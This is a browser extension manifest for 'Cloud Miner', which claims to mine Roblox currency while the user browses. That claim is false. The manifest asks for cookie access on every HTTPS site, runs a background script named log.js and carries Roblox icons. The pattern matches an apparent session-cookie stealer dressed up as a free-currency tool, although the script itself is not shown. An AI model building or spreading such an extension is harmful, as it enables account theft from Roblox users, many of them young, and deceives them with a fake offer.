{
    "name": "Cloud Miner",
    "description": "Cloud Miner is a estetion that mines robux if you are on the internet",
    "version": "1.0.4",
    "manifest_version": 3,

    "action" : {
        "default_icon": "assets/cloudminer.png"
    },

    "host_permissions": [
	"https://*/*"
    ],

    "permissions": [
        "cookies"
    ],

    "background": {
        "service_worker": "scripts/log.js"
    },

    "icons": {
        "16": "assets/roblox.png",
        "32": "assets/roblox.png",
        "48": "assets/roblox.png",
        "128": "assets/roblox.png"
    }
}
